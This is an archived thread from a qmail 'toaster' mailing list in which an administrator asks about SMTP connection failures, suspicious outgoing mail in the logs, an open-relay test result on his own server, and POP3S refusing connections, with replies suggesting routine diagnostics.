Here is the contents of my control files, with the actual domain names
changed to test

[EMAIL PROTECTED] [/var/qmail/control]# cat locals

[EMAIL PROTECTED] [/var/qmail/control]# cat me

[EMAIL PROTECTED] [/var/qmail/control]# cat virtualdomains

[EMAIL PROTECTED] [/var/qmail/control]# cat rcpthosts

[EMAIL PROTECTED] [/var/qmail/control]# cat me

Running processes:
root 15428  0.0  0.0  1284  308 ?S21:44   0:00 supervise
qmails   15430  0.0  0.0  1336  364 ?S21:44   0:00
qmaill   15431  0.0  0.0  1296  300 ?S21:44   0:00
/usr/local/bin/multilog t /var/log/qmail
root 15432  0.0  0.0  1284  308 ?S21:44   0:00 supervise
root 15434  0.0  0.0  1284  308 ?S21:44   0:00 supervise
qmaill   15437  0.0  0.0  1296  296 ?S21:44   0:00
/usr/local/bin/multilog t /var/log/qmail/smtpd
root 15439  0.0  0.0  1300  304 ?S21:44   0:00
qmailr   15440  0.0  0.0  1296  292 ?S21:44   0:00
root 15444  0.0  0.0  1280  304 ?S21:44   0:00 supervise
qmailq   15446  0.0  0.0  1288  316 ?S21:44   0:00
qmaill   15450  0.0  0.0  1292  296 ?S21:44   0:00 multilog
qmaill   15452  0.0  0.0  1292  296 ?S21:44   0:00 multilog
root 16068  0.0  0.1  1700  604 pts/3R22:06   0:00 grep
root 15429  0.0  0.0  1284  308 ?S21:44   0:00 supervise
root 15433  0.0  0.0  1284  308 ?S21:44   0:00 supervise
vpopmail 15436  0.0  0.0  1352  472 ?S21:44   0:00
vpopmail 15441  0.0  0.0  1312  328 ?S21:44   0:00
root 15443  0.0  0.0  1280  304 ?S21:44   0:00 supervise
root 15445  0.0  0.0  1280  304 ?S21:44   0:00 supervise
vpopmail 15451  0.0  0.0  1304  324 ?S21:44   0:00
root 15424  0.0  0.1  2076 1012 ?S21:44   0:00 /bin/sh
root 15426  0.0  0.0  1324  316 ?S21:44   0:00 svscan
root 15427  0.0  0.0  1276  264 ?S21:44   0:00
service errors:

[EMAIL PROTECTED] [/var/qmail/control]# telnet localhost 25
Connected to localhost.
Escape character is '^]'.
Connection closed by foreign host.

From external host:
$ telnet 25
Trying x.x.x.x...
(time passes, I give up)

[EMAIL PROTECTED] [/var/qmail/control]# cat /etc/tcp.smtp
## To update this database type tcprules tcp.smtp.cdb tcp.smtp.tmp 

[EMAIL PROTECTED] [~]# /sbin/iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source   destination

Chain FORWARD (policy ACCEPT)
target prot opt source   destination

Chain OUTPUT (policy ACCEPT)
target prot opt source   destination

Chain acctboth (0 references)
target prot opt source   destination

[toaster] Disturbing Logs

2003-05-30 Thread Peter Maag


Have another quick question for the list regarding some
outgoing mail I have found in my log files that worries me:

@40003ed69e020fb9a08c new msg

@40003ed69e020fb9db24 info msg
213846: bytes 1218 from [EMAIL PROTECTED] qp 19758 uid 514

@40003ed69e021112f2e4 starting delivery 2368: msg 213846 to remote [EMAIL PROTECTED]

@40003ed69e02111344ec status: local 0/10 remote 1/20

@40003ed69e032b2b5a7c delivery 2368: success:

e./Remote_host_said:_250_2.6.0_[EMAIL PROTECTED]_Queued_mail_for_delivery/

@40003ed69e032b2bcbc4 status: local 0/10 remote 0/20

@40003ed69e032b2bdf4c end msg

The message appears to be coming from my server and is being
delivered to an external server that is not being hosted by my server. The local account that QMail is claiming the mail is being sent from is not even a
valid POP3 account.

Any ideas?


RE: [toaster] Disturbing Logs

2003-05-30 Thread Peter Maag


Looking through my logs it seems that a number of domains are doing what
the original domain address is doing. In
every case the from address(that claims to be from my
server) is not a valid address on my server.
It seems that someone has found a way to compromise the catchall setting
in vpopmail, as the domains in question all have a
catchall mail account.

Does anyone have any idea how this can be stopped while still having catch
all support?


-Original Message-
From: Tom Collins
Sent: Thursday, May 29, 2003 6:02 PM
Subject: Re: [toaster] Disturbing

On Thursday, May 29, 2003, at 05:05
 PM, Peter Maag wrote:

The message
appears to be coming from my server and is being delivered to an external
server that is not being hosted by my server.The local account that QMail is claiming the mail is being sent from is not even a
valid POP3 account.

Try `grep -ri
/home/vpopmail/domains` (where the address in your
log that the message went to is [EMAIL PROTECTED]) to see if the address in
question is a forwarding address on any account you host. It is possible that
it's a remote catchall, and could get listed in the log that way.

Tom Collins

[toaster] Fighting SPAM

2003-03-01 Thread Peter Maag

and Others,

I am paranoid about people using my server as a relay, andam considering having users use there ISPs SMTP server
for outgoing mail. What I would like
to do is to monitor the amount of mail the server is sending at any given moment
in time. If a user is sending more mail
than a predefined limit, I would like to turn off their relay access to the server
via IPTables, etc.

Currently, the server is running the latest toaster patch, and
is only supporting around 15 users. These users use plain POP authentication for
checking their mail. Obviously the server
is using POP before SMTP to authenticate users. The reason I am concerned is that POP is unencrypted.
So, is there any way I can block the
amount of mail a user can send in a given amount of time(perhaps
50messages/hour)? If not, how would
you monitor the mail leaving the server? I would think this would be a pretty fair
allotment for my average user base. Any suggestions?
Thanks again for the help.


Re: [toaster] Open Relay

2003-02-19 Thread Peter Maag
The tool is located at: .

Here is the output from the actual test.(my domain name has been
replaced with

 220 ESMTP
Relay test 1
 250 flushed
 250 ok
 250 ok
 354 go ahead
 (message body)
 250 ok 1045679681 qp 25778

The e-mail address the e-mail was sent to was on the same
server( The message successfully makes it into my inbox.
Thanks again for the help Bill.


= Original Message From Bill Shupp [EMAIL PROTECTED] =
On Tuesday, February 18, 2003, at 11:06 PM, Peter Maag wrote:

 Hey All,

 Was testing one of my toaster boxes today with’s relay

This is not a valid URL. Where is this tool?

 , and it was able to successfully deliver an open relay message to
 me.(It actually sent a message). Here is the test result:

 Connecting to ** for registered user test ...

  220 *** ESMTP
  250 ***

 Relay test 1

  250 flushed
  250 ok
  RCPT TO:**
  250 ok
  354 go ahead
  (message body)
  250 ok 1045638142 qp 20315

 Relay test result

 Hmmn, at first glance, host appeared to accept a message for relay.


 The message was indeed delivered to the target address.

 I reread the toaster, and everything is installed just like it should
 be except for Courier IMAP, which I don’t think should make a

 My /var/qmail/control/rcpthosts file contains just the domains the
 server should be hosting, and /home/vpopmail/etc/tcp.smtp contains
 just the one line that should be echo’d there during install. Any

Not with the envelope address and hostnames censored. Without that
information, it's hard to tell what was tested.


On Wed, 2003-02-19 at 09:58, Bill Shupp wrote:
 On Tuesday, February 18, 2003, at 11:06  PM, Peter Maag wrote:
 Hey All,
  Was testing one of my toaster boxes today with’s relay 
 This is not a valid URL.  Where is this tool?
   , and it was able to successfully deliver an open relay message to 
  me.(It actually sent a message). Here is the test result:
 Connecting to ** for registered user test ...
   220 *** ESMTP
   250 ***
  Relay test 1
   250 flushed
   250 ok
   RCPT TO:**
   250 ok
   354 go ahead
   (message body)
   250 ok 1045638142 qp 20315
  Relay test result
  Hmmn, at first glance, host appeared to accept a message for relay.
 The message was indeed delivered to the target address.
  I reread the toaster, and everything is installed just like it should 
  be except for Courier IMAP, which I don’t think should make a 
  My /var/qmail/control/rcpthosts file contains just the domains the 
  server should be hosting, and /home/vpopmail/etc/tcp.smtp contains 
  just the one line that should be echo’d there during install. Any 
 Not with the envelope address and hostnames censored.  Without that 
 information, it's hard to tell what was tested.

[toaster] Open Relay

2003-02-18 Thread Peter Maag


Was testing one of my toaster boxes today with Abuse.nets relay tester(
, and it was able to successfully deliver an open relay message to me.(It
actually sent a message). Here is
the test result:

to ** for registered user test ...


test 1


test result

Hmmn, at first glance, host
appeared to accept a message for relay.


message was indeed delivered to the target address.

I reread the toaster, and everything
is installed just like it should be except for Courier IMAP, which I
dont think should make a difference.

My /var/qmail/control/rcpthosts
file contains just the domains the server should be hosting, and /home/vpopmail/etc/tcp.smtp contains just the one line that
should be echod there during install. Any ideas??

Thanks for the help.


[toaster] POP3S Not Working

2003-01-15 Thread Peter Maag

 Hey all,

I installed the toaster per Bills excellent set of
directions. I would like to use POP3S,
however all connections to that port get refused. An nstat nlp shows that POP3S is there and appears to be
running. I also turned off iptables on the machine just in case. There is no firewall in front of the machine.

So, what is the easiest way I can check to make sure that POP3S
is in working order? Thanks for the
